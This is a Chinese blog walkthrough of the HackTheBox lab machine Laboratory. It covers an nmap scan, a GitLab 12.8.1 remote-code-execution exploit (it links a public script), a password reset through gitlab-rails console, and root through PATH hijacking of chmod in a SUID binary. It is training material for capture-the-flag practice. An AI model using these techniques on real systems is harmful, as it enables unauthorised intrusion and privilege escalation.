文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox-Retired

HackTheBox-Active

VulnHub

代码审计

PHP代码审计

大数据安全

机器学习

基础学习

Python

Python基础

Python安全

Java

Java基础

Java安全

算法

Leetcode

随笔

经验

技术

 2021-04-16   738

HackTheBox Laboratory Walkthrough

0x01 Info Card

0x02 Tools and Tips

  • Nmap
  • itlab 12.8.1 file read RCE
  • gitlab-rails console
  • ltrace
  • chmod command PATH HIJACKING

0x03 Pentesting

Gaining Foothold

Nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
# Nmap 7.91 scan initiated Tue Jan 26 10:50:56 2021 as: nmap -sV -sC -T4 -Pn -oN nmap.txt 10.10.10.216
Nmap scan report for 10.10.10.216
Host is up (0.23s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA)
| 256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA)
|_ 256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after: 2024-03-03T10:39:28
| tls-alpn:
|_ http/1.1
Service Info: Host: laboratory.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 26 10:54:09 2021 -- 1 IP address (1 host up) scanned in 193.24 seconds

80端口:

Find a vulnerability in this website? You’re lying! We code 100% secure, and I’m sure you can’t hack us. If you do, definitely don’t let us know.

已经提醒我们这个站是100%安全的,不过还有一个443端口:

1
2
3
4
5
6
7
8
9
443/tcp open  ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after: 2024-03-03T10:39:28
| tls-alpn:
|_ http/1.1

git.laboratory.htb加入到/etc/hosts文件中,访问发现是一个gitlab:

使用@laboratory.htb邮件域名注册账号登录,可看到版本号12.8.1

msf上有关于gitlab 12.8.1 LFI2RCE的模块:

github上也有利用脚本:https://github.com/dotPY-hax/gitlab_RCE/blob/main/gitlab_rce.py

设置:

拿到反弹shell:

Privilege Escalation

Get User Access

当前身份是git,当前目录是位于gitlab-rails,看/etc/passwd没有可用用户,感觉这应该是在docker环境当中。

但是用网上的payload,Docker没能逃逸出来,看了眼WP,原来是用gitlab-rails console改ceo用户的密码。

https://www.cnblogs.com/youzhibing/p/12572598.html

成功登录后,在dexter某个docker-secure仓库中发现了SSH private key:

下载到本地用dexter身份登录SSH:

Get Root Access

不会,看WP了。。

/usr/local/bin/docker-security是SUID执行程序,使用ltrace来跟踪进程调用库函数的情况 :

做了2次chmod

It’s using chmod without specify the full path /usr/bin/chmod

So This is exploited by Path-Hijacking.

If you don’t known about PATH-HIJACKING read this article.

Linux Privilege Escalation Using PATH Variable

因为没有使用完整路径/usr/bin/chmod,所以我们可以通过增加环境变量的方式劫持这个路径,实现提权:

但是这里手速慢了,靶机会定时refresh,尽量10s之内完成:

Copyright © ca01h 2019-2021 | 本站总访问量